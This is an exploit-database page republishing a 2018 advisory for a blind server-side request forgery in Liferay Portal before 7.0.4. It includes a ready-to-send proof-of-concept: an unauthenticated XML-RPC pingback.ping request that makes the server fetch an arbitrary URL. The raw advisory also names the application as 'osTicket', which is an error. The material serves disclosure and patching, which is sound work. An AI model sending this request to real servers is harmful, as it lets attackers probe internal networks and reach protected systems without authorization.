header-logo
Suggest Exploit
vendor:
Liferay Portal
by:
Mehmet Ince
8.8
CVSS
HIGH
Server-Side Request Forgery
918
CWE
Product Name: Liferay Portal
Affected Version From: <= 7.0.4
Affected Version To: 7.0.4
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Java
2018

Liferay Portal < 7.0.4 Blind Server-Side Request Forgery

A Blind Server-Side Request Forgery (SSRF) vulnerability was identified in Liferay Portal versions prior to 7.0.4. An attacker can exploit this vulnerability to send arbitrary requests from the vulnerable server to internal or external systems. This can be used to gain access to sensitive information or to perform malicious activities.

Mitigation:

Upgrade to Liferay Portal version 7.0.4 or later.
Source

Exploit-DB raw data:

1. ADVISORY INFORMATION

========================================

Title: Liferay Portal < 7.0.4 Blind Server-Side Request Forgery

Application: osTicket

Remotely Exploitable: Yes

Authentication Required: NO

Versions Affected: <= 7.0.4

Technology: Java

Vendor URL: liferay.com

Date of found: 04 December 2017

Disclosure: 25 June 2018

Author: Mehmet Ince



2. CREDIT

========================================

This vulnerability was identified during penetration test

by Mehmet INCE from PRODAFT / INVICTUS



3. Technical Details & POC

========================================

POST /xmlrpc/pingback HTTP/1.1

Host: mehmetince.dev:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/47.0.2526.73 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 361


<?xml version="1.0" encoding="UTF-8"?>

<methodCall>

<methodName>pingback.ping</methodName>

<params>

<param>

<value>http://TARGET/</value>

</param>

<param>

<value>http://mehmetince.dev:8080/web/guest/home/-/blogs/30686</value>

</param>

</params>

</methodCall>

Navigation

Suggest Exploit

Services By CQR